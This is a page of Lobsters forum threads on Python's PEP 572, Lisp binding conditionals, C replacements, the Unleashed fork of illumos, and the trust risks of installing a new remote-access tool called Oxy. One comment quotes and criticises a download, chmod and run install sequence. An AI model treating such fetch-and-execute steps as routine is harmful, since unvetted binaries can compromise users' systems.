                                                                      It doesn’t benefit performance at all near as I can tell, at least not in its current incarnation.

                                                                      Cython DOES in fact do this, but the types you hint with there are C types.

                                                                      1. 2

                                                                        Ah, I thought maybe MyPy actually could do some transformation of the code, based on it’s understanding, but it appears to describe itself as a “linter on steroids,” implying that it only looks at your code in a separate phase before you run it.

                                                                        Typed Racket has some ability to optimize code, but it’s not nearly as sophisticated as other statically typed languages.

                                                                      2. 3

                                                                        Be aware that even Typed Racket still has performance and usability issues in certain use cases. The larger your codebase, the large the chance you will run into them. The ultimate viability of gradual typing is still an open question.

                                                                      3. 3

                                                                        In no way did I imply that you should “shut up and go away”.

                                                                        What I want is for people who make comments about Python’s speed to be aware of the alternatives, understand the trade-offs, and generally be mindful of what they’re asking for.

                                                                        I may have made some false assumptions in your case, and for that I apologize. I should have known that this community generally attracts people who have more going on than is the norm (and the norm is unthinking end users posting WHY MY CODE SO SLOW?

                                                                        1. 2

                                                                          Hey, no problem! I’m just amused at the whole tone of this set of threads set by the original response (not yours) to my comment, lecturing me on a variety of things. I had no idea that (and can’t fathom why) my brief comment regarding prioritization decisions of a project would be taken so personally and raise so much bile. What I’m saying is also not so controversial - big public projects have a tendency to veer into big arguments over little details while huge gaps in use cases remain. I saw this particular PEP argument as a hilarious illustration of this phenomenon in how Python is being run.

                                                                          1. 3

                                                                            Thinking about this a little more - sometimes, when languages ‘evolve’ I feel like they forget themselves. What makes this language compelling for vast numbers of programmers? What’s the appeal?

                                                                            In Python’s case, there are several, but two for sure are a super shallow learning curve, and its tendency towards ‘un-clever’ syntax.

                                                                            I worry that by morphong into something else that’s more to your liking for performance reasons, those first two tenets will get lost in the shuffle, and Python will lose its appeal for the vast majority of us who are just fine with Python’s speed as is.

                                                                            1. 1

                                                                              Yes, though we must also remember that as users of Python, invested in it as a user interface for our code ideas, we are resistant to any change. Languages may lose themselves, but changes are sometimes hugely for the better. And it can be hard to predict.

                                                                              In Python’s 2.x period, what we now consider key features of the language, like list comprehensions and generator expressions and generators, were “evolved” over a base language that lacked those features altogether, and conservatives in the community were doubtful they’d get much use or have much positive impact on code. Likewise for the class/type system “unification” before that. Python has had a remarkable evolutionary approach over its long 3-decade life, and will continue to do so even post-GvR. That may be his true legacy.

                                                                  3. 1

                                                                    Heh. I think this is an example of the Lobste.rs rating system working as it should :) I posted an immoderate comment borne of an emotional response to a perfectly reasonable reply, and end up with a +1: +4 -2 troll, -1 incorrrect :)

                                                                1. 1

                                                                  Merge with this?

                                                                  1. 1

                                                                    Better to just delete. My mistake.

                                                                  1. 1

                                                                    Related to anaphoric macros.

                                                                    I like the improved style vs. Graham’s implicit bindings, but for whatever reason binding conditionals in Lisp never gained traction. Perhaps they are just harder to read.

                                                                    1. 1

                                                                      These are(were?) super common in Clojure, fwiw. I can’t fathom a reason they ‘d be popular in Clojure, but not in Common Lisp, other than one having a Lisp-1 and a community that hates typing more characters than necessary…but in that case, the implied ‘it Would be better….

                                                                      1. 1

                                                                        I can’t fathom a reason they ‘d be popular in Clojure, but not in Common Lisp

                                                                        They’re included in the Clojure standard library, but you have to write them yourself in CL (or use a library). That’s probably why.

                                                                        1. 1

                                                                          Right. The barrier to entry is far less in Clojure, but the idea of binding conditionals was not new in Clojure. So there was lots of opportunity for CL users to adopt it, and for it to end up in SBCL’s standard library, or be a quicklisp library away. That seems to have not happened.

                                                                    1. 5

                                                                      C matched the programming metaphors in UNIX because both occurred contemporaneously. That is why it was such a useful systems programming language, just as PL/1 did for MULTICS.

                                                                      If we evaluate systems programming languages against current need inside kernel/OS/utilities/libraries, won’t we come up short because the metaphors don’t match well anymore? Sure, we’ve stretched things with extensions to C, but that just makes C suffice for need, and no one will attempt to match metaphors to any new language because it’s shooting at TWO moving targets (the language and what it’s used for).

                                                                      Perhaps the success of C/UNIX derivatives forestalls their necessary concurrent replacement?

                                                                      1. 5

                                                                        After watching all the language wars play out, I started pushing the idea that a C replacement should keep its style and compatibility as much as possible. The same data types, calling conventions, automatic C FFI, extract to C for its compilers, whatever. Maybe close on the syntax like some competitors were. Then, on top of that, build something better without its shortcomings. Might be better module system, concurrency, macros, live coding a la Lisp/Smalltalk, and so on. It should be something that leverages the experience of those converting that plugs right into the ecosystem getting all its benefits. Plus, allows incremental rewrites of legacy codebases.

                                                                        Clay and Cyclone at least attempted something like this on safety side. I found another one that did on productivity side I’m submitting Sunday. I don’t see many attempts, though. Most take people far away from C model to then try to do something in a C model system.

                                                                        1. 4

                                                                          I’m keeping an eye on zig.

                                                                          1. 3

                                                                            D.

                                                                            1. 2

                                                                              That’s a quite reasonable concern. Share it as well. Because minimalism has a fundamental advantage in and of itself in composition.

                                                                              I think what replaces all of C (and all of UNIX) is in like manner such “composable minimalism”. But I’m not convinced that it will be “C like” or “UNIX like” at all, because the metaphors that are incompletely fit in this modern environment.

                                                                              I greatly enjoyed working in Python for its clarity and focus on writing concise and understandable code, but what with the PEP 572 that is compelling van Rossum to step down as Python BDFL, once can see the limits of how far that can be taken. (He’s very emotional about what I regard as an “overreach”.)

                                                                              I’ve been wrestling with Rust, attempting to rewrite my earlier kernel work in it in place of C, and it does have definite advantages. However, unlike C and Python, too much is “lost in translation” - code becomes obscure. Gets back to Ken Thompson’s comment in UNIX V5/6 “you are not expected to understand this” in doing his backwards coroutine context switch.

                                                                              So again we are at a crossroads - we might need a new metaphor, but not have it in sight yet.

                                                                              You want more low level hardware “involvement”, but wish to have the logic become more densely abstract to deal with complexity. You want greater “stop on a dime” debugging, but also “obviousness” in exposition to avoid much need for awkward comments. I’ve been thinking about AR/ML means to do augmented development as a means to bridging these, but we’ll see.

                                                                              1. 1

                                                                                Far as low-level Rust, you might find this work interesting given it’s about composing abstractions to deal with low-level stuff in embedded. The Tock people are also publishing interesting stuff. For now, I’m not sure if you were having problems due to the language itself, abstractions you were using, or some combination. Rust programmers are still in early exploration stage for that stuff.

                                                                                There’s also the possibility, which I encourage, of using safe/proven C or assembly for unsafe stuff with safe Rust for the rest that can support better abstraction. By safe/proven, I’m talking types like Cyclone/Clay or automated solvers like Frama-C/SPARK. Even if manual, there’s probably only a small amount of code we’d need specialists for. If doing generic components with reuse, then even that might be reduced. To be clear, I’m just brainstorming here based on all the reuse I’m seeing in Why3-based, CompCert-based and Myreen et al-based work.

                                                                                re AR/ML. I’ve been thinking of them for verification more than debugging. I just don’t have the depth required to know more past “attempt to apply the generic methods that work on everything to see what each accomplishes.” Monkey try thing, monkey see it work, monkey do more of that. That suggestion isn’t worth a Lobsters or IEEE submission, though. ;)

                                                                            1. 2

                                                                              Not sure why this was posted again so soon…

                                                                            1. 7

                                                                              So, I’ve been thinking that we really should have a wiki or book somewhere of standard business problems. Things like “this is basic inventory system”, “this is basic user manage”, and so forth, along with common design parameters and operating regimes.

                                                                              1. 1

                                                                                I really like this idea. One step more abstract: these are common parameters of a basic inventory system, here’s an implementation, and by the way here are some other tricky things that this toy system doesn’t solve. My concern with a wiki of implementations is that it would be easy for readers to turn off their brain. Including some “exercises for the reader” might help inform them of the problem space.

                                                                                1. 1

                                                                                  Yeah, a book really would be more ideal.

                                                                                  It’s also useful because it’s a good way of saying to a business “hey, you are business in wrong…why does our inventory system not follow normal practices?”

                                                                                  1. 1

                                                                                    Yeah, a book really would be more ideal.

                                                                                    My set of encyclopedias from 1989 says otherwise.

                                                                                    I worry that something like this implies that there’s only 1 correct way to do things, when that is often not true. And in fact, if it were, I don’t think we would have seen such explosive growth in our field…

                                                                              1. 4

                                                                                “Hooray! We have forked an already small community into yet another smaller community because…”

                                                                                Well, the “because” doesn’t really matter, even though they make extremely valid points! In an already incredibly fragmented community (how many derivatives of OpenSolaris does this make?) this makes the problem bigger…

                                                                                I don’t follow illumos very closely, but are there reasons that community won’t assist in pushing towards solving the concerns that sparked unleashed? Surely illumos is also an operating system that “developers want to use,” no?

                                                                                1. 10

                                                                                  As always, we’re happy to work with people who want to push changes to illumos-gate!

                                                                                  1. 5

                                                                                    xkcd 1095 seems relevant. :^)

                                                                                    1. 1

                                                                                      Yeah, maybe. :)

                                                                                    2. 4

                                                                                      If the illumos community were healthy I would agree with you and I wouldn’t have bothered to create this fork. Sadly, I think the illumos community has problems and the people that truly have a lot of say where the project goes either don’t see them or like the status quo.

                                                                                      Two years ago when I started Unleashed, I had a dilemma: should I fork illumos or ditch it for one of the BSDs. When I realized that there were other people that were just as unhappy with the (lack of) direction illumos had, making a fork sounded like a good option. That’s how we got here.

                                                                                      Now where do we go from here is an open question. It is completely possible that Unleashed will fizzle, at which point I can say that no real harm was done. The illumos community will remain as small as it was two days ago, with major contributors like Delphix bailing on illumos in favor of Linux. If Unleashed takes off and in the process kills off illumos, the overall ecosystem will be better off. There might be a person or two grumpy that they can’t run their emacs binary from 1994, but in my opinion that is a small price to pay.

                                                                                      Surely illumos is also an operating system that “developers want to use,” no?

                                                                                      That is the reason I considered and ultimately went with a fork instead of bailing on it. The technology in Solaris/OpenSolaris/illumos/Unleashed is great, and I didn’t want to give it up. I wanted to give up the hugely inefficient and ultimately counter-productive contribution process.

                                                                                      Happy hacking!

                                                                                      1. 4

                                                                                        Thanks for taking the time to respond. I know my post probably came off as aggressive, and if I’m honest, it was half intended to be. I think forks are very disruptive, and wish, of course, to minimize these sorts of things when at all possible.

                                                                                        When I realized that there were other people that were just as unhappy with the (lack of) direction illumos had, making a fork sounded like a good option.

                                                                                        This makes total and reasonable sense. I didn’t mean to imply that you hadn’t thought this through! And appreciate that you used it as a sort of last resort.

                                                                                        That is the reason I considered and ultimately went with a fork instead of bailing on it. The technology in Solaris/OpenSolaris/illumos/Unleashed is great, and I didn’t want to give it up. I wanted to give up the hugely inefficient and ultimately counter-productive contribution process.

                                                                                        Thanks for doing what you’re doing, and I wish Unleashed success (and maybe either domination or an eventual merge of the communities again)!

                                                                                        1. 3

                                                                                          Thanks for taking the time to respond.

                                                                                          No problem. I really had no choice - someone on the internet was “wrong” ;)

                                                                                          I know my post probably came off as aggressive, and if I’m honest, it was half intended to be.

                                                                                          The phrasing certainly made me go “urgh, not one of those…” but it sounds like we both agree that forks are disruptive, but you think that it’s a negative thing while I think it is a positive thing. A reasonable difference of opinion.

                                                                                          Thanks for doing what you’re doing, and I wish Unleashed success (and maybe either domination or an eventual merge of the communities again)!

                                                                                          Thanks, that’s the idea :)

                                                                                          1. 2

                                                                                            The phrasing certainly made me go “urgh, not one of those…”

                                                                                            There’s really nothing I can offer as a legitimate excuse for that. I’m sorry.

                                                                                            but you think that it’s a negative thing while I think it is a positive thing. A reasonable difference of opinion.

                                                                                            The additional context you’ve provided makes me feel that it probably is the right, and positive choice in this case. I’m not vehemently against forks if there’s a legitimately good reason [and just to be clear, moving on from supporting legacy stuff is the important divergence I’m seeing, as it frees up resources to move faster]. I am against forks that don’t offer some radical divergence in philosophy, though. These are often rooted from deep bikeshedding on topics that don’t matter in the grand scheme of things.

                                                                                            Two examples of justified forks in my opinion: @rain1 recently forked filezilla because it was incorporating “unwanted extra nonfree software.” Devuan is a fork of Debian that replaces systemd – a topic that is far beyond bikeshedding at this point, as it’s had (and will continue to have) a drastic effect on the portability of software to other ecosystems.

                                                                                            1. 1

                                                                                              There’s really nothing I can offer as a legitimate excuse for that. I’m sorry.

                                                                                              No worries. Hopefully my initial response didn’t come across as too harsh either. If it did, my apologies.

                                                                                              I am against forks that don’t offer some radical divergence in philosophy, though.

                                                                                              Agreed. Although sometimes it is hard to tell if there is a justification for the fork.

                                                                                              1. 2

                                                                                                I am against forks that don’t offer some radical divergence in philosophy, though.

                                                                                                Agreed. Although sometimes it is hard to tell if there is a justification for the fork

                                                                                                I wonder when we started to need a justification.

                                                                                                Why?

                                                                                                1. 11

                                                                                                  I wonder when we started to need a justification.

                                                                                                  You do you, man. You do you.

                                                                                                  In my mind, there are two types of forks we’re talking about. One of them is a “fork” on github, where I clone the repo, make some changes, contribute it back to the original author (or maybe not!), and live a happy life. These types of forks are almost always ok. It’s the “You do you, man. You do you.” response.

                                                                                                  The other “fork” is far more challenging, and far more likely to cause a rift in spacetime. Those are the large, and by all accounts, successful projects that as a result divide a community, and make it difficult for users and would be contributors to find the right thing to use. These projects fork very publicly, and are rather uncomfortable, to be honest.

                                                                                                  In many cases, these forks occurred because egos were hurt (I wanted it yellow) – a social issue – not a technical issue. In other cases, there’s a large philosophical difference that impacts the general direction of the technology. This may be licensing, whether or not to support obscure platforms, a radical new idea or focus… etc. In all cases, even if there are legitimately great outcomes (OpenBSD comes to mind), there’s a period of confusion and frustration from users who are now forced to choose where to put their effort. They are forced into taking sides, and that’s unfair.

                                                                                                  1. 1

                                                                                                    These are marketing concerns. Market share issues, to be precise.

                                                                                                    They are valid for open source projects that are basically marketing tools, but they are pointless for free software that maximizes hackers’ freedom to hack.

                                                                                                    Feeling the need to justify a fork, is the first step towards asking permission.
                                                                                                    The PATENTS file in projects like Fuchsia’s kernel sources just push for that.

                                                                                                    1. 5

                                                                                                      Sorry, my friend. Most people don’t share your principles on what a ‘hack,’ or a ‘hacker’ is. More often than not, the people using, and writing software care more about getting the job done quickly, and without frustration, and a fork makes that harder. It doesn’t matter how you classify it.

                                                                                                      1. 0

                                                                                                        people using, and writing software care more about getting the job done quickly, and without frustration

                                                                                                        And this is fine!

                                                                                                        But, my friend, you need to understand the tools you use!
                                                                                                        If you pick up a free software that is distributed “WITHOUT ANY WARRANTY” just because it’s free of charge, and you completely miss the culture of the people who develop it, you won’t get your job done. Same if you pick an open source software controlled by Google (or whoever) and you fork it to successfully challenge their market share.

                                                                                                        In both cases, you’ll face surprises, unexpected costs and frustration.

                                                                                                        Understanding the environment you operate in, is strategic to “get the job done”.

                                                                                                        Most people don’t share your principles on what a ‘hack,’ or a ‘hacker’ is.

                                                                                                        Interesting! Do you have world-wide statistics to prove such claim?

                                                                                                        Not that it matters: “principles” stand to “artifacts” like “postulates” stand to “theorems”. How many people accept the postulates/principles is irrelevant.

                                                                                                        I know that some people don’t share my principles. And I’m fine with it.
                                                                                                        Do you know that some people don’t share your principles?
                                                                                                        Are you fine with it?

                                                                                                        1. 2

                                                                                                          But, my friend, you need to understand the tools you use! If you pick up a free software that is distributed “WITHOUT ANY WARRANTY” just because it’s free of charge, and you completely miss the culture of the people who develop it, you won’t get your job done. Same if you pick an open source software controlled by Google (or whoever) and you fork it to successfully challenge their market share.

                                                                                                          In both cases, you’ll face surprises, unexpected costs and frustration

                                                                                                          I read this several times and can’t figure out what you’re saying.

                                                                                                          Why do I need to understand the culture of a tool I use? As long as it fulfills my technical needs and I know what I’m prohibited to do by law, I can use it to get my job done.

                                                                                                          1. 1

                                                                                                            Why do I need to understand the culture of a tool I use?

                                                                                                            Some example of the issues you might face:

                                                                                                            • an security update could be delayed
                                                                                                            • an update upstream could break your work in production
                                                                                                            • you (or one of your customers) could be sued for patent violation (even if you are not actually violating it)
                                                                                                            • the project might contain backdoors and your image could be associated with it

                                                                                                            and so on…

                                                                                                            You could ignore the culture of tools you get for free, and be lucky.
                                                                                                            But in my job, I would call that short-sight and unprofessional.

                                                                                                            Software is not like an hammer: even if you take it free of charges, there are strings attached.

                                                                                                            1. 2

                                                                                                              Some example of the issues you might face…

                                                                                                              There are ways around much of these concerns. I have a support contract, or trust in a distribution (say, Canonical for Ubuntu or Red Hat), which provides vuln disclosures, and updates for me to apply. I have a development process that includes QA, and automated CI infrastructure so that breaking changes are caught before production… etc.

                                                                                                              But, to the meta point:

                                                                                                              But, my friend, you need to understand the tools you use!

                                                                                                              Demonstrably this is not at all true. It’s easy to do a survey of 100 people – 10 people even, and ask them if they understand their tools. How are their tools implemented? How does the relational database they store and query data into/from store data on disk? How does the map type work in their favorite language? How does the VM work? How does the ORM work? How does the templating language they use work? How does the image processing library they use work to resize images, or rotate images, or whatever work? How does TensorFlow do all it does?

                                                                                                              What you’ll find is that a large portion of engineers have no idea how things work. And they don’t need to know. Their job is to build CRUD apps for people who could care less if something takes a little bit longer. The developer themselves, in many cases, could care less about BTREE indexes vs. HASH indexes, and doesn’t really know the difference. For the amount of data they manipulate, doing full table scans 3 times an hour (because they literally have 3 queries an hour) is completely sane, reasonable, and still puts a smile on the face of the Administrative assistant who no longer has to go to a type writer to type out a bunch of labels. Or, who no longer has to print 10,000 college applications to give to admissions reviewers… or any number of other tasks where even the worst technology choices, recommended by underskilled developers can make a ginormous (and) positive difference on the process.

                                                                                                              1. 0

                                                                                                                There are ways around much of these concerns.

                                                                                                                Sure, but the simplest one is to understand the tools you use.

                                                                                                                And actually, trusting Debian (or OpenBSD or whatever) or signing support a contract with Canonical (or Red Hat or Microsoft or whatever) requires the cultural understanding of such people I was talking about.

                                                                                                                Demonstrably this is not at all true. […]
                                                                                                                …even the worst technology choices, recommended by underskilled developers can make a ginormous (and) positive difference on the process.

                                                                                                                Practically you are saying: “everyone can become rich without working: just win the lottery!”. Well, this is not false. Stick on boring low-hanging fruits all your life and you will never face the issues that a professional developer has to consider every day.

                                                                                                                What you describe is not to “get the job done”.
                                                                                                                People die because of people who work this way.

                                                                                                                In Italy we use to say: “even a broken clock can be right twice a day”.
                                                                                                                Yes, incompetent developers can occasionally improve the life of someone, but for most of time, they just mess up things beyond repair.

                                                                                                                1. 4

                                                                                                                  Practically you are saying: “everyone can become rich without working: just win the lottery!”. Well, this is not false. Stick on boring low-hanging fruits all your life and you will never face the issues that a professional developer has to consider every day.

                                                                                                                  What you describe is not to “get the job done”. People die because of people who work this way.

                                                                                                                  I believe this comment really lacks perspective. What you are saying is the Shamar-style of development is the only correct style of development and anyone not doing it that way is not only doing it wrong but putting people’s lives at risk.

                                                                                                                  The industry I work in produces a lot of software and consumes a lot of software, however no company in this industry would consider itself a tech company. We have people whose job title is “Software Engineer”. But, for the most part, they make pretty bad technical decisions and are fairly unskilled relative to the engineers at most tech companies. But, they aren’t “trying to get rich without working” or “win the lottery”. They are very hard working. The industry just has a different set of values where the software is incidental to the actual problem the company is solving. A lot of the things you brought up in an earlier post about why one needs to understand the culture of the software they consume doesn’t actually apply in the industry I’m in. Security updates and backdoors are almost never going to be a concern because these systems are not open to the outside. The data they consume is entirely generated and processed inside the walls of the company. In the industry I’m in, we’re actually saving lives too! I mean that literally.

                                                                                                                  I hate to use this word, but your comment is elitist. Anyone not solving problems how you say is not a professional and just causing damage “beyond repair”. Your comment lacks humility and perspective yet is extremely assertive. It might be worth stepping back and questioning if what you assert so strongly is an ideal, a belief, or reality. Or perhaps it’s a challenge with the language and you don’t realize how assertive your comments sound relative to how assertive you meant them to be. But insisting people not following your development principles are killing people is a pretty strong statement, in any case.

                                                                                                                  1. 0

                                                                                                                    But insisting people not following your development principles are killing people is a pretty strong statement, in any case.

                                                                                                                    I was not talking about software development in particular.

                                                                                                                    Incompetent engineers build bridges that fell off.
                                                                                                                    Incompetent phyisicians do not cure mortal deseases properly. And so on.
                                                                                                                    They can get some work done, but it’s lucky, like winning te lottery.

                                                                                                                    As for software, I do not means that a competent software developer cannot adopt a cheap half-working solution instead of an expensive “right” one (whatever it means in the context).

                                                                                                                    On the contrary!
                                                                                                                    I mean that to make a choice you need competence.

                                                                                                                    I’m saying that only a competent professional that knows the tools she use can really “get the job done”.
                                                                                                                    An incompetent one can be lucky some times, but you cannot trust her products and thus the job is not done.

                                                                                                                    Or perhaps it’s a challenge with the language

                                                                                                                    Actually, I’m rather surprised by the opposition such a simple and obvious concept is facing. All other craftmen I know (the real ones, not the software ones) agree that it takes years to “own” their tools.

                                                                                                                    Probably we have diverged too much from the original topic, and we are facing a deep cultural mismatch.

                                                                                                                    In Europe (that, let me say, is not living up to its own values these days) we are used to be very diverse and inclusive (note: it took centuries of wars, rapes, debates, commerce, poetry, science, curiosity and many other contaminations to get here).

                                                                                                                    But we do not meld the meaning of words just to include more people.

                                                                                                                    We clearly see and state the differences, and happily talk about them.

                                                                                                                    And this is not elitism, it’s efficient communication.

                                                                                                                    When we say “job” or “done” we convey a precise message.
                                                                                                                    And if a bridge fell off and kills someone, we call the engineers who built it liars because the job was not done. At times they even stop being called engineers at all.

                                                                                                                    1. 2

                                                                                                                      You don’t give an inch, do you? I’ve explicitly said that I work in an industry that does not do software development like you have expressed it should be done and your response is to keep on insisting on it. On top of that, you did this annoying thing where this discussion has clearly been about software development but when I pushed back you move the goal post and start talking about bridges and medicine. It’s extremely challenging and frustrating to communicate with you, I need to work on not doing that. Thanks for the discussion, it was insightful for myself.

                                                                                                                  2. 3

                                                                                                                    Looks like someone got a degree in being right on the Internet! There’s no point in engaging with you, and if there was a feature to block users, I would make use of it.

                                                                                                                    1. 0

                                                                                                                      I’m sorry about this.

                                                                                                                      If you lack arguments to support your assuptions, I can suggest to simply state such assumptions clearly. For example:

                                                                                                                      Users and companies are entitled to get work and value from software developers for free, because they are in a rush to get their job done.
                                                                                                                      FS and OSS forks hurts this right.

                                                                                                                      I would deeply disagree on such premise.
                                                                                                                      But I wouldn’t argue against the conclusions.

                                                                                                                      1. 2

                                                                                                                        Did you just tell me to go fuck myself?

                                                                                                                        1. 1

                                                                                                                          Ok, this must really be a language problem.

                                                                                                                          I cannot find a translation of what I wrote that can be interpreted that way!

                                                                                                                          Anyway: No, I’m not telling you to fuck yourself.

                                                                                                                          1. 2

                                                                                                                            I just spent 30 minutes carefully crafting a response to your absurd notion that everyone must be highly skilled or people will die. But, it’s just not worth it. You’ll find a way to twist it into something it’s not, and yell loudly about how I’m wrong without considering that you may be shortsighted in your assumptions.

                                                                                                                            1. 0

                                                                                                                              I’m sorry for the time you wasted.

                                                                                                                              I do not think that “everyone must be highly skilled or people will die”.

                                                                                                                              I think that everyone should be professional in his own job.
                                                                                                                              Which, at the bare minimium, means to understand the tools you use.

                                                                                                                              you may be shortsighted in your assumptions.

                                                                                                                              I woudn’t even engage if I woud not assume this to be possible: there would be nothing to learn.

                                                                                          2. 3

                                                                                            Question that I have that isn’t clear from the post. Do you intend to maintain enough compat with Illumos that you would be able to get improvements that were done n something like SmartOS? Are you planning on continuing to pulls changes from Illumos? Planning to try contributing changes back? Or is this a hard fork where you don’t imagine there would be cross pollination?

                                                                                            1. 4

                                                                                              Good questions!

                                                                                              1. Source-level compat, yes until it stops to make sense. Binary compat, no.
                                                                                              2. I’ll continue git-pull from illumos-gate until it starts to be too cumbersome due to divergence. Once that happens, I’ll probably still take commits from illumos-gate but I’ll be more selective. In addition to illumos-gate, we cherry-pick changes from the illumos downstreams (omnios, illumos-joyent, etc.). This is open source, if those repos have good changes I’d be stupid not to take them because they were authored “outside”.
                                                                                              3. I have no plan to get changes back into illumos, however the code is open so others can do it. As an example, Toomas Soome took one of the cleanups in Unleashed and got it into illumos-gate (87bdc12930bfa66277c45510e399f8a01e06c376). He also has a work-in-progress to get our cpio-based boot_archives into illumos, but I don’t know the status of that.

                                                                                              Hopefully I covered everything.

                                                                                        1. 14

                                                                                          Yeah…. OK.

                                                                                          curl -O https://oxy-secure.app/oxy
                                                                                          chmod +x oxy
                                                                                          ./oxy --help
                                                                                          

                                                                                          I know this practice has, again and again, been discussed to various levels of “this is no different than your package manager over HTTPS.”

                                                                                          But, this is shocking: “trust the security of your network to a brand new protocol implemented in this convenient, 3 command installable, binary. Be sure to download it as root, just for good measure. What do you have to lose?”

                                                                                          1. 6

                                                                                            I upvoted you, and then looked closer realizing that they aren’t asking people to run a bash script from the Internet. Perhaps you misread, as I did, what the instructions were saying?

                                                                                            It’s basically standard practice for people to download compiled binaries from the Internet and run them (certainly on Windows and macOS). curl is not being run as root. And just below those instructions are compile-your-own binary instructions, for those who would rather compile it themselves:

                                                                                            cargo install --git https://github.com/oxy-secure/oxy
                                                                                            ~/.cargo/bin/oxy --help
                                                                                            

                                                                                            Which, incidentally, has the exact same trust assumptions (X.509) as the downloaded binary.

                                                                                            1. 5

                                                                                              they aren’t asking people to run a bash script from the Internet.

                                                                                              No. What they’re doing is kind of worse. Instead of telling you to download and run a bash script from the internet, (which you could reasonably inspect first), they’re telling you to run a binary that obscures the fact that it’s doing something malicious.

                                                                                              And, sure, you can cargo install it after auditing the source, but can I be reasonably sure that the binary is derived from that source? No. I can’t. Assuming reproducible builds, I could reproduce the build and compare a checksum, but that binary could have been created from a slightly different, and malicious source tree. When given the choice of downloading a recently compiled binary, and waiting 30 seconds for rust to build it (with the cargo instructions), maybe I say, “eh, that’s OK, I’ll just take the pre-compiled one.” Social engineering at it’s finest! Tell people they can wait, or have it right now….

                                                                                              But, let’s assume that it’s “accepted practice” to download and run random binaries off of a mysterious website that doesn’t even list its authors… Maybe we should… I don’t know… stop doing that????

                                                                                              But, but, but, package servers are just protected by X.509, too! you say. Sure. The transport is protected by that. But, there’s also (usually) some level of trust associated with a package server. In the case of most distributions you’ve got signed packages. In the case of homebrew, you have the ability to choose where you get your formulae from, which has implications in the trust model. I don’t know much more about homebrew, but I assume they at least compare known checksums from the formulae to checksums of downloaded source tarballs?

                                                                                              https://secure.app/oxy was put on the internet by someone – looking at the commit history, https://github.com/jennamagius – whose discoverable online presence is: “Hi, I’m Jenna” (via https://jenna.app/ redirected from jennamagius.github.io). If that isn’t suspicious to you… god speed.

                                                                                              1. 2

                                                                                                I’ll double down on that saying this is a remote, access tool. Those are front doors for the good folks or backdoors for the bad folks depending on how they’re implemented or how much (if any) monitoring is happening. High-value target. One should only use a RAT that’s been thoroughly vetted by people that have a track record breaking bad protocols, crypto, etc. Actually, these are such necessary and risky tools that they’re among the few I think deserve all the assurance we can throw at them. All the way up to formal proof. Plus, ability for much independent verification.

                                                                                                Until multiple, independent assessments confirm quality/security, I’d ignore whatever the new RAT tool is to stick with OpenSSH or something with lots of review and use in the field. Those wanting improvements can enhance their code or UI piece by piece carefully testing and vetting the changes for now. For reliability, too, since more bugs will have been shaken out. Next worst thing to hackers getting in your system is you not getting in your own system due to immature software breaking. They tend to do it at worst times, too.

                                                                                                1. 1

                                                                                                  Also, I realize I didn’t really respond to your specific claim “… (certainly on Windows and macOS)”

                                                                                                  I don’t use Windows anymore – not in 18 years at this point. But, my understanding is that they are adopting a “store” model to combat this practice. The same with Apple and the Mac App Store. It’s true that you can still download and run random Apps on OS X, but you’re given plenty of warnings, and the practice is pretty discouraged by Apple.

                                                                                                  If for some reason someone like GitHub decides to not use the Mac App Store to distribute Atom, well, it’s perhaps the case that you trust GitHub to host and provide an untampered with binary, because you actually trust your other data to GitHub.

                                                                                                  1. 3

                                                                                                    I will reply to both of your replies here.

                                                                                                    So, you raised several concerns. Let’s go through them again.

                                                                                                    Be sure to download it as root, just for good measure.

                                                                                                    I pointed out the authors (whoever they are), never suggested you do this, and their instructions do not tell people to do that. So, that’s one down, let’s move on to the next concern.

                                                                                                    they’re telling you to run a binary that obscures the fact that it’s doing something malicious.

                                                                                                    This appears to be your other main concern, the basic idea of installing software not-from-source.

                                                                                                    This is a common practice on macOS, Windows, and Linux. I would venture to say that 99.99% of users do this.

                                                                                                    But, in later comment, you bring up app stores:

                                                                                                    But, my understanding is that they are adopting a “store” model to combat this practice. The same with Apple and the Mac App Store. It’s true that you can still download and run random Apps on OS X, but you’re given plenty of warnings, and the practice is pretty discouraged by Apple.

                                                                                                    I will point out that your original comment, to which I was replying to, never mentioned anything about being upset that oxy was not registered in an app store. Yes, you did mention package managers, but both app stores and package managers are known to distribute malware from time to time, and many of them come with differing trust assumptions (some worse than others).

                                                                                                    So a package manager or app store is no guarantee that the binary you’re installing is safe at all, and you’re back to square one with your trust assumptions.

                                                                                                    https://jenna.app/ redirected from jennamagius.github.io). If that isn’t suspicious to you… god speed.

                                                                                                    Now this is a perfectly reasonable concern. Had you raised the trustworthiness of the particular author of the software as your concern in your original comment to which I replied, I would never have replied, because that’s a legitimate concern.

                                                                                                    1. 1

                                                                                                      I pointed out the authors (whoever they are), never suggested you do this, and their instructions do not tell people to do that.

                                                                                                      Of course they didn’t. I was adding a figurative eye roll, which I’m pretty sure went right past you—I am sorry that I failed to make that more clear.

                                                                                                      Naturally, some number of people installing this software in the recommended way will want to copy this into /usr/bin, or /usr/local/bin, though. How many people blindly ./configure && make && sudo make install?

                                                                                                      On to the next point!

                                                                                                      package managers

                                                                                                      I am not upset by the fact that it’s not in a package manager. I am upset that it’s promoting a shitty practice, which has no auditability, no update mechanism, and no oversight whatsoever.

                                                                                                      Package managers are not perfect, as you have pointed out. However, they represent an additional check in the process for someone to think twice about including it, and, in doing so, take some responsibility, and a hit in reputation/ trust, when they do something that results in malware, or something else malicious. At least, that should be the case…

                                                                                                      trustworthiness of author

                                                                                                      It stands to reason that a person creating a security tool such as this, and claiming it is so much better than other solutions understands that the installation practice being described is controversial. This is at least doubly/quadruply true for a RAT tool.

                                                                                                      I see no reason why skepticism to the 10,000th degree isn’t being applied here…

                                                                                                      Have we all just given up on security? I mean…

                                                                                                      1. 3

                                                                                                        I see no reason why skepticism to the 10,000th degree isn’t being applied here…

                                                                                                        Have we all just given up on security? I mean…

                                                                                                        It is not too uncommon for the author of a piece of security software to want to remain anonymous.

                                                                                                        There is nothing wrong with expressing concern, but if you do it, it should be (a) relevant/legitimate concern, and (b) balanced appropriately in the event that your suspicions of the project turn out to be misplaced. Someone out there did, after all, spend a lot of time putting effort into creating an alleged improved, rustified RAT, and if their work is legitimate they deserve kudos for that.

                                                                                                        1. 2

                                                                                                          I’m one of the people that pushes look at the work, not the author. I’ll take software from the NSA if it’s rigorously vetted by 3rd parties I trust with a matching signature. That philosophy is what old, security certifications tried to achieve on highest levels. However, I do accept looking at the author as a heuristic for making quick decisions if not much else is available. One thing we see a lot in INFOSEC is people good at secure protocols have a track record of… writing secure code or protocols. They get good by publishing some work, getting it reviewed, often getting their asses handed to them, fixing it, and repeat. It might be shared more privately with instructors or fellow hackers doing same process. There will be references, prior work, prior writings describing work… something to evaluate… for either their actual identity or their alias they stick with.

